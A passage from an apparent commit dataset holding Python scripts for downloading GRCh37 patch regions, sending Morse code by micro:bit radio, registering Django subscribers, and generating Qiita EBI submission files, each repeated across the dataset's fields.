GrcRegion = namedtuple("GrcRegion", "chrom,start,end,name")
with closing(urllib2.urlopen(url)) as in_handle:
header = in_handle.next()
for parts in (l.split("\t") for l in in_handle):
try:
chrom = int(parts[5])
except ValueError:
chrom = parts[5]
yield GrcRegion(chrom, int(parts[11]), int(parts[12]),
"grc_%s" % ("fix" if parts[2].endswith("PATCH") else "novel"))
if __name__ == "__main__":
main()
|
Add download script to get GRC patch regions for annotation
|
Add download script to get GRC patch regions for annotation
|
Python
|
mit
|
bgruening/gemini,bw2/gemini,heuermh/gemini,arq5x/gemini,xuzetan/gemini,bw2/gemini,bpow/gemini,arq5x/gemini,heuermh/gemini,bpow/gemini,bpow/gemini,bpow/gemini,arq5x/gemini,heuermh/gemini,bgruening/gemini,xuzetan/gemini,heuermh/gemini,bgruening/gemini,arq5x/gemini,bw2/gemini,bw2/gemini,udp3f/gemini,bgruening/gemini,udp3f/gemini,brentp/gemini,brentp/gemini,brentp/gemini,udp3f/gemini,xuzetan/gemini,brentp/gemini,xuzetan/gemini,udp3f/gemini
|
Add download script to get GRC patch regions for annotation
|
#!/usr/bin/env python
"""Retrieve information on patches and fixes to GRCh37 from GRC website.
Converts information on these regions into a BED file for Gemini import.
http://www.ncbi.nlm.nih.gov/projects/genome/assembly/grc/human/
"""
import urllib2
from collections import namedtuple
from operator import attrgetter
from contextlib import closing
patch = "p8"
base_url = "ftp://ftp.ncbi.nlm.nih.gov/genbank/genomes/Eukaryotes/" \
"vertebrates_mammals/Homo_sapiens/GRCh37.{0}/".format(patch)
sub_url = "/alt_scaffolds/alt_scaffold_placement.txt"
dirs = ["PATCHES"] + ["ALT_REF_LOCI_%s" % i for i in range(1, 10)]
def main():
out_file = "GRC_patch_regions.bed"
regions = []
for dname in dirs:
cur_url = base_url + dname + sub_url
for region in grc_regions_from_url(cur_url):
regions.append(region)
regions.sort(key=attrgetter("chrom", "start", "end"))
with open(out_file, "w") as out_handle:
for region in regions:
out_handle.write("{chrom}\t{start}\t{end}\t{name}\n".format(
**vars(region)))
def grc_regions_from_url(url):
GrcRegion = namedtuple("GrcRegion", "chrom,start,end,name")
with closing(urllib2.urlopen(url)) as in_handle:
header = in_handle.next()
for parts in (l.split("\t") for l in in_handle):
try:
chrom = int(parts[5])
except ValueError:
chrom = parts[5]
yield GrcRegion(chrom, int(parts[11]), int(parts[12]),
"grc_%s" % ("fix" if parts[2].endswith("PATCH") else "novel"))
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add download script to get GRC patch regions for annotation<commit_after>
|
#!/usr/bin/env python
"""Retrieve information on patches and fixes to GRCh37 from GRC website.
Converts information on these regions into a BED file for Gemini import.
http://www.ncbi.nlm.nih.gov/projects/genome/assembly/grc/human/
"""
import urllib2
from collections import namedtuple
from operator import attrgetter
from contextlib import closing
patch = "p8"
base_url = "ftp://ftp.ncbi.nlm.nih.gov/genbank/genomes/Eukaryotes/" \
"vertebrates_mammals/Homo_sapiens/GRCh37.{0}/".format(patch)
sub_url = "/alt_scaffolds/alt_scaffold_placement.txt"
dirs = ["PATCHES"] + ["ALT_REF_LOCI_%s" % i for i in range(1, 10)]
def main():
out_file = "GRC_patch_regions.bed"
regions = []
for dname in dirs:
cur_url = base_url + dname + sub_url
for region in grc_regions_from_url(cur_url):
regions.append(region)
regions.sort(key=attrgetter("chrom", "start", "end"))
with open(out_file, "w") as out_handle:
for region in regions:
out_handle.write("{chrom}\t{start}\t{end}\t{name}\n".format(
**vars(region)))
def grc_regions_from_url(url):
GrcRegion = namedtuple("GrcRegion", "chrom,start,end,name")
with closing(urllib2.urlopen(url)) as in_handle:
header = in_handle.next()
for parts in (l.split("\t") for l in in_handle):
try:
chrom = int(parts[5])
except ValueError:
chrom = parts[5]
yield GrcRegion(chrom, int(parts[11]), int(parts[12]),
"grc_%s" % ("fix" if parts[2].endswith("PATCH") else "novel"))
if __name__ == "__main__":
main()
|
Add download script to get GRC patch regions for annotation#!/usr/bin/env python
"""Retrieve information on patches and fixes to GRCh37 from GRC website.
Converts information on these regions into a BED file for Gemini import.
http://www.ncbi.nlm.nih.gov/projects/genome/assembly/grc/human/
"""
import urllib2
from collections import namedtuple
from operator import attrgetter
from contextlib import closing
patch = "p8"
base_url = "ftp://ftp.ncbi.nlm.nih.gov/genbank/genomes/Eukaryotes/" \
"vertebrates_mammals/Homo_sapiens/GRCh37.{0}/".format(patch)
sub_url = "/alt_scaffolds/alt_scaffold_placement.txt"
dirs = ["PATCHES"] + ["ALT_REF_LOCI_%s" % i for i in range(1, 10)]
def main():
out_file = "GRC_patch_regions.bed"
regions = []
for dname in dirs:
cur_url = base_url + dname + sub_url
for region in grc_regions_from_url(cur_url):
regions.append(region)
regions.sort(key=attrgetter("chrom", "start", "end"))
with open(out_file, "w") as out_handle:
for region in regions:
out_handle.write("{chrom}\t{start}\t{end}\t{name}\n".format(
**vars(region)))
def grc_regions_from_url(url):
GrcRegion = namedtuple("GrcRegion", "chrom,start,end,name")
with closing(urllib2.urlopen(url)) as in_handle:
header = in_handle.next()
for parts in (l.split("\t") for l in in_handle):
try:
chrom = int(parts[5])
except ValueError:
chrom = parts[5]
yield GrcRegion(chrom, int(parts[11]), int(parts[12]),
"grc_%s" % ("fix" if parts[2].endswith("PATCH") else "novel"))
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add download script to get GRC patch regions for annotation<commit_after>#!/usr/bin/env python
"""Retrieve information on patches and fixes to GRCh37 from GRC website.
Converts information on these regions into a BED file for Gemini import.
http://www.ncbi.nlm.nih.gov/projects/genome/assembly/grc/human/
"""
import urllib2
from collections import namedtuple
from operator import attrgetter
from contextlib import closing
patch = "p8"
base_url = "ftp://ftp.ncbi.nlm.nih.gov/genbank/genomes/Eukaryotes/" \
"vertebrates_mammals/Homo_sapiens/GRCh37.{0}/".format(patch)
sub_url = "/alt_scaffolds/alt_scaffold_placement.txt"
dirs = ["PATCHES"] + ["ALT_REF_LOCI_%s" % i for i in range(1, 10)]
def main():
out_file = "GRC_patch_regions.bed"
regions = []
for dname in dirs:
cur_url = base_url + dname + sub_url
for region in grc_regions_from_url(cur_url):
regions.append(region)
regions.sort(key=attrgetter("chrom", "start", "end"))
with open(out_file, "w") as out_handle:
for region in regions:
out_handle.write("{chrom}\t{start}\t{end}\t{name}\n".format(
**vars(region)))
def grc_regions_from_url(url):
GrcRegion = namedtuple("GrcRegion", "chrom,start,end,name")
with closing(urllib2.urlopen(url)) as in_handle:
header = in_handle.next()
for parts in (l.split("\t") for l in in_handle):
try:
chrom = int(parts[5])
except ValueError:
chrom = parts[5]
yield GrcRegion(chrom, int(parts[11]), int(parts[12]),
"grc_%s" % ("fix" if parts[2].endswith("PATCH") else "novel"))
if __name__ == "__main__":
main()
|
|
c99929e2aaa119104c20b0d865b8e42c0b15a03e
|
morse/morse_radio.py
|
morse/morse_radio.py
|
# Import modules
from microbit import *
import radio
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"g": "--.",
"h": "....",
"i": "..",
"j": ".---",
"k": "-.-",
"l": ".-..",
"m": "--",
"n": "-.",
"o": "---",
"p": ".--.",
"q": "--.-",
"r": ".-.",
"s": "...",
"t": "-",
"u": "..-",
"v": "...-",
"w": ".--",
"x": "-..-",
"y": "-.--",
"z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
morse_string = ""
pressed = 0
paused = 0
letters = []
radio.on()
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
#check for incoming messages
incoming = radio.receive()
if incoming is not None:
print(incoming.split("|"))
sent_letters = []
for letter in incoming.split("|"):
sent_letters.append(get_letter(letter) if letter != " " else " ")
display.scroll("".join(sent_letters))
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
morse_string += current_letter + "|"
current_letter = ""
if paused >= 200:
letters.append(" ")
morse_string += "| |"
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
morse_string += current_letter
display.scroll("".join(letters))
paused = 0
pressed = 0
print(morse_string)
radio.send(morse_string)
current_letter = ""
morse_string = ""
letters = []
|
Add ability to send morse code via radio
|
Add ability to send morse code via radio
|
Python
|
mit
|
OiNutter/microbit-scripts
|
Add ability to send morse code via radio
|
# Import modules
from microbit import *
import radio
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"g": "--.",
"h": "....",
"i": "..",
"j": ".---",
"k": "-.-",
"l": ".-..",
"m": "--",
"n": "-.",
"o": "---",
"p": ".--.",
"q": "--.-",
"r": ".-.",
"s": "...",
"t": "-",
"u": "..-",
"v": "...-",
"w": ".--",
"x": "-..-",
"y": "-.--",
"z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
morse_string = ""
pressed = 0
paused = 0
letters = []
radio.on()
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
#check for incoming messages
incoming = radio.receive()
if incoming is not None:
print(incoming.split("|"))
sent_letters = []
for letter in incoming.split("|"):
sent_letters.append(get_letter(letter) if letter != " " else " ")
display.scroll("".join(sent_letters))
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
morse_string += current_letter + "|"
current_letter = ""
if paused >= 200:
letters.append(" ")
morse_string += "| |"
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
morse_string += current_letter
display.scroll("".join(letters))
paused = 0
pressed = 0
print(morse_string)
radio.send(morse_string)
current_letter = ""
morse_string = ""
letters = []
|
<commit_before><commit_msg>Add ability to send morse code via radio<commit_after>
|
# Import modules
from microbit import *
import radio
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"g": "--.",
"h": "....",
"i": "..",
"j": ".---",
"k": "-.-",
"l": ".-..",
"m": "--",
"n": "-.",
"o": "---",
"p": ".--.",
"q": "--.-",
"r": ".-.",
"s": "...",
"t": "-",
"u": "..-",
"v": "...-",
"w": ".--",
"x": "-..-",
"y": "-.--",
"z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
morse_string = ""
pressed = 0
paused = 0
letters = []
radio.on()
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
#check for incoming messages
incoming = radio.receive()
if incoming is not None:
print(incoming.split("|"))
sent_letters = []
for letter in incoming.split("|"):
sent_letters.append(get_letter(letter) if letter != " " else " ")
display.scroll("".join(sent_letters))
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
morse_string += current_letter + "|"
current_letter = ""
if paused >= 200:
letters.append(" ")
morse_string += "| |"
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
morse_string += current_letter
display.scroll("".join(letters))
paused = 0
pressed = 0
print(morse_string)
radio.send(morse_string)
current_letter = ""
morse_string = ""
letters = []
|
Add ability to send morse code via radio# Import modules
from microbit import *
import radio
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"g": "--.",
"h": "....",
"i": "..",
"j": ".---",
"k": "-.-",
"l": ".-..",
"m": "--",
"n": "-.",
"o": "---",
"p": ".--.",
"q": "--.-",
"r": ".-.",
"s": "...",
"t": "-",
"u": "..-",
"v": "...-",
"w": ".--",
"x": "-..-",
"y": "-.--",
"z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
morse_string = ""
pressed = 0
paused = 0
letters = []
radio.on()
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
#check for incoming messages
incoming = radio.receive()
if incoming is not None:
print(incoming.split("|"))
sent_letters = []
for letter in incoming.split("|"):
sent_letters.append(get_letter(letter) if letter != " " else " ")
display.scroll("".join(sent_letters))
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
morse_string += current_letter + "|"
current_letter = ""
if paused >= 200:
letters.append(" ")
morse_string += "| |"
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
morse_string += current_letter
display.scroll("".join(letters))
paused = 0
pressed = 0
print(morse_string)
radio.send(morse_string)
current_letter = ""
morse_string = ""
letters = []
|
<commit_before><commit_msg>Add ability to send morse code via radio<commit_after># Import modules
from microbit import *
import radio
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"g": "--.",
"h": "....",
"i": "..",
"j": ".---",
"k": "-.-",
"l": ".-..",
"m": "--",
"n": "-.",
"o": "---",
"p": ".--.",
"q": "--.-",
"r": ".-.",
"s": "...",
"t": "-",
"u": "..-",
"v": "...-",
"w": ".--",
"x": "-..-",
"y": "-.--",
"z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
morse_string = ""
pressed = 0
paused = 0
letters = []
radio.on()
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
#check for incoming messages
incoming = radio.receive()
if incoming is not None:
print(incoming.split("|"))
sent_letters = []
for letter in incoming.split("|"):
sent_letters.append(get_letter(letter) if letter != " " else " ")
display.scroll("".join(sent_letters))
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
morse_string += current_letter + "|"
current_letter = ""
if paused >= 200:
letters.append(" ")
morse_string += "| |"
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
morse_string += current_letter
display.scroll("".join(letters))
paused = 0
pressed = 0
print(morse_string)
radio.send(morse_string)
current_letter = ""
morse_string = ""
letters = []
|
|
7ed12facca2f94eb8bba721e9b11882ea24726fe
|
crmapp/subscribers/views.py
|
crmapp/subscribers/views.py
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
# Create the User record
user = User(username=username, email=email)
user.set_password(password)
user.save()
# Create Subscriber Record
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
from .models import Subscriber
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
# Create the User record
user = User(username=username, email=email,
first_name=first_name, last_name=last_name)
user.set_password(password)
user.save()
# Create Subscriber Record
address_one = form.cleaned_data['address_one']
address_two = form.cleaned_data['address_two']
city = form.cleaned_data['city']
state = form.cleaned_data['state']
sub = Subscriber(address_one=address_one, address_two=address_two,
city=city, state=state, user_rec=user)
sub.save()
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
Create the Subscriber Form - Part II > Update the View
|
Create the Subscriber Form - Part II > Update the View
|
Python
|
mit
|
deenaariff/Django,tabdon/crmeasyapp,tabdon/crmeasyapp
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
# Create the User record
user = User(username=username, email=email)
user.set_password(password)
user.save()
# Create Subscriber Record
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
Create the Subscriber Form - Part II > Update the View
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
from .models import Subscriber
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
# Create the User record
user = User(username=username, email=email,
first_name=first_name, last_name=last_name)
user.set_password(password)
user.save()
# Create Subscriber Record
address_one = form.cleaned_data['address_one']
address_two = form.cleaned_data['address_two']
city = form.cleaned_data['city']
state = form.cleaned_data['state']
sub = Subscriber(address_one=address_one, address_two=address_two,
city=city, state=state, user_rec=user)
sub.save()
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
<commit_before>from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
# Create the User record
user = User(username=username, email=email)
user.set_password(password)
user.save()
# Create Subscriber Record
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
<commit_msg>Create the Subscriber Form - Part II > Update the View<commit_after>
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
from .models import Subscriber
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
# Create the User record
user = User(username=username, email=email,
first_name=first_name, last_name=last_name)
user.set_password(password)
user.save()
# Create Subscriber Record
address_one = form.cleaned_data['address_one']
address_two = form.cleaned_data['address_two']
city = form.cleaned_data['city']
state = form.cleaned_data['state']
sub = Subscriber(address_one=address_one, address_two=address_two,
city=city, state=state, user_rec=user)
sub.save()
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
# Create the User record
user = User(username=username, email=email)
user.set_password(password)
user.save()
# Create Subscriber Record
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
Create the Subscriber Form - Part II > Update the Viewfrom django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
from .models import Subscriber
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
# Create the User record
user = User(username=username, email=email,
first_name=first_name, last_name=last_name)
user.set_password(password)
user.save()
# Create Subscriber Record
address_one = form.cleaned_data['address_one']
address_two = form.cleaned_data['address_two']
city = form.cleaned_data['city']
state = form.cleaned_data['state']
sub = Subscriber(address_one=address_one, address_two=address_two,
city=city, state=state, user_rec=user)
sub.save()
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
<commit_before>from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
# Create the User record
user = User(username=username, email=email)
user.set_password(password)
user.save()
# Create Subscriber Record
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
<commit_msg>Create the Subscriber Form - Part II > Update the View<commit_after>from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
from .models import Subscriber
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
# Create the User record
user = User(username=username, email=email,
first_name=first_name, last_name=last_name)
user.set_password(password)
user.save()
# Create Subscriber Record
address_one = form.cleaned_data['address_one']
address_two = form.cleaned_data['address_two']
city = form.cleaned_data['city']
state = form.cleaned_data['state']
sub = Subscriber(address_one=address_one, address_two=address_two,
city=city, state=state, user_rec=user)
sub.save()
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
872159c61ee20be1befdfa21e42c54f2b420c7b8
|
qiita_ware/commands.py
|
qiita_ware/commands.py
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join
from os import makedirs
from functools import partial
from qiita_db.study import Study
from qiita_db.metadata_template import PrepTemplate, SampleTemplate
from qiita_ware.ebi import EBISubmission
def generate(study_id, output_dir, action, investigation_type):
# Get study information from database
study_id_str = str(study_id)
study = Study(study_id)
submission = EBISubmission(study_id_str, study.title,
study.info['study_abstract'],
investigation_type)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
sample_template_fp = get_output_fp('sample_template.tsv')
sample_template = SampleTemplate(study.sample_template)
sample_template.to_file(sample_template_fp)
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
def generate_from_files(study_id, sample_template, prep_template_fps,
fastq_dir, investigation_type, output_dir):
study = Study(study_id)
study_id_str = str(study_id)
prep_templates = [open(prep_template_fp)
for prep_template_fp in prep_template_fps]
submission = from_templates_and_per_sample_fastqs(
study_id_str, study.title, study.info['study_abstract'],
investigation_type, sample_template, prep_templates, fastq_dir)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
for prep_template in prep_templates:
prep_template.close()
|
Add library code for ebi functions
|
Add library code for ebi functions
|
Python
|
bsd-3-clause
|
squirrelo/qiita,ElDeveloper/qiita,wasade/qiita,RNAer/qiita,squirrelo/qiita,antgonza/qiita,adamrp/qiita,adamrp/qiita,antgonza/qiita,antgonza/qiita,adamrp/qiita,biocore/qiita,wasade/qiita,josenavas/QiiTa,ElDeveloper/qiita,antgonza/qiita,RNAer/qiita,squirrelo/qiita,wasade/qiita,RNAer/qiita,josenavas/QiiTa,RNAer/qiita,josenavas/QiiTa,biocore/qiita,squirrelo/qiita,adamrp/qiita,ElDeveloper/qiita,ElDeveloper/qiita,biocore/qiita,josenavas/QiiTa,biocore/qiita
|
Add library code for ebi functions
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join
from os import makedirs
from functools import partial
from qiita_db.study import Study
from qiita_db.metadata_template import PrepTemplate, SampleTemplate
from qiita_ware.ebi import EBISubmission
def generate(study_id, output_dir, action, investigation_type):
# Get study information from database
study_id_str = str(study_id)
study = Study(study_id)
submission = EBISubmission(study_id_str, study.title,
study.info['study_abstract'],
investigation_type)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
sample_template_fp = get_output_fp('sample_template.tsv')
sample_template = SampleTemplate(study.sample_template)
sample_template.to_file(sample_template_fp)
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
def generate_from_files(study_id, sample_template, prep_template_fps,
fastq_dir, investigation_type, output_dir):
study = Study(study_id)
study_id_str = str(study_id)
prep_templates = [open(prep_template_fp)
for prep_template_fp in prep_template_fps]
submission = from_templates_and_per_sample_fastqs(
study_id_str, study.title, study.info['study_abstract'],
investigation_type, sample_template, prep_templates, fastq_dir)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
for prep_template in prep_templates:
prep_template.close()
|
<commit_before><commit_msg>Add library code for ebi functions<commit_after>
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join
from os import makedirs
from functools import partial
from qiita_db.study import Study
from qiita_db.metadata_template import PrepTemplate, SampleTemplate
from qiita_ware.ebi import EBISubmission
def generate(study_id, output_dir, action, investigation_type):
# Get study information from database
study_id_str = str(study_id)
study = Study(study_id)
submission = EBISubmission(study_id_str, study.title,
study.info['study_abstract'],
investigation_type)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
sample_template_fp = get_output_fp('sample_template.tsv')
sample_template = SampleTemplate(study.sample_template)
sample_template.to_file(sample_template_fp)
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
def generate_from_files(study_id, sample_template, prep_template_fps,
fastq_dir, investigation_type, output_dir):
study = Study(study_id)
study_id_str = str(study_id)
prep_templates = [open(prep_template_fp)
for prep_template_fp in prep_template_fps]
submission = from_templates_and_per_sample_fastqs(
study_id_str, study.title, study.info['study_abstract'],
